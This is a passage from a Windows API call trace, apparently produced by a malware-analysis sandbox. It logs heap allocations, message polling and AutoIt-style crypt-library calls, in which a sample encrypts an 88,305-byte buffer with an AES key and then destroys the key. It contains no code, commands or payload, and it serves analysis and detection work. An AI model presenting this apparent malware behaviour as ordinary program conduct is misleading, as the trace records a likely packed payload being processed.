lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.173] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0191.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0191.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.176] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2668, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2668*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0191.176] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.176] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.177] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.177] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.177] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.177] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.177] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.177] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.177] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0191.177] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.198] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.199] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.199] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x158e9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x158f0) returned 1 [0191.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.199] CharLowerBuffW (in: lpsz="byte[88305]", cchLength=0xb | out: lpsz="byte[88305]") returned 0xb [0191.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.204] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8a1f8*, pdwDataLen=0x87e820*=0x158e9, dwBufLen=0x158f0 | out: pbData=0xa8a1f8*, pdwDataLen=0x87e820*=0x158f0) returned 1 [0191.205] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.205] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.205] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.207] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0191.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.207] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.207] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.207] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0191.209] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.209] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.209] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.209] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0191.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.219] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.219] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.219] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.225] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0191.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.225] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.225] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0191.225] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.225] CryptDestroyKey (hKey=0x90aed8) returned 1 [0191.225] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 